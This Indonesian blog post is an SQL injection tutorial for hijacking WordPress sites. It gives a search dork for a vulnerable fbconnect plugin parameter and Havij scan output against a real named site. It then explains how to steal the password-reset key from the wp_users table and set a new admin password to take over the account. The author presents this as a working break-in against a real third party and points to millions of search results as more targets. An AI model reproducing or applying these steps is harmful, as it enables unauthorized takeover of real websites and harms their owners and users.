totorial sql injection ~ Ivul varel
totorial sql injection

totorial sql injection

07:04
Siapa yang tidak kenal dengan wordpress. Ternyata wordpress dapat diexploitkan dengan 1 dork yang bisa dikembangkan. Disini saya akan mengajarkan sedikit dari exploit wordpress. DIsini kita belajar hack wordpress menggunakan SQL Injection.


Date : 24/02/2012 << Verified

Dork : inurl:"fbconnect_action=myhome" << bisa dikembangkan

Author : k1r4 = me
Tools : havij
Exploit : Forgot Password
http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin



disini saya akan memberi target...

http://sinjai.linux.or.id/

http://sinjai.linux.or.id/?fbconnect_action=myhome&userid=2

ganti jadi

http://sinjai.linux.or.id/?fbconnect_action=myhome&fbuserid=2<<tambahkan fb
Analyzing http://sinjai.linux.or.id/?fbconnect_action=myhome&fbuserid=2

Host IP: 49.50.8.85

Web Server: Apache

Keyword Found: Facebook

Injection type is Integer

Can't find db server type! But maybe there be some chances! [-o<

Selected Column Count is 12

Valid String Column is 6

DB Server: MySQL

Current DB: h80929_wp2


INGET 1 hal penting,,,

http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin



site = http://sinjai.linux.or.id/

QbiDH7xcZJT3d53XnKmB = activation key

admin = username



http://sinjai.linux.or.id/wp-login.php

klik lupa password

atau tambahkan <> ?action=lostpassword

http://sinjai.linux.or.id/wp-login.php?action=lostpassword

masukan admin << sebagai username yang ada di table wp-user yang discan melalui havij...



kalau disini saya mendapatkan keynya YU4X3EwGEaHGueg2NA7S

cara mendapatkannya menggunakan havij masuk ke table wp-user

jadi dengan exploit forgot password

http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin

kita kembangkan...

http://sinjai.linux.or.id/wp-login.php?action=rp&key=YU4X3EwGEaHGueg2NA7S&login=admin



dan masukan password baru kita..

dan akhirnya login...

http://sinjai.linux.or.id/wp-login.php

username : admin

password : k1r4



SELAMAT ANDA SUDAH MASUK KE ADMINNYA...

Sekitar 3,480,000 hasil (0.24 detik) << hasil pencarian di google

About

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

Next
« Prev Post
Previous
Next Post »
Post a Comment
Thanks for your comment
Subscribe to: Post Comments (Atom)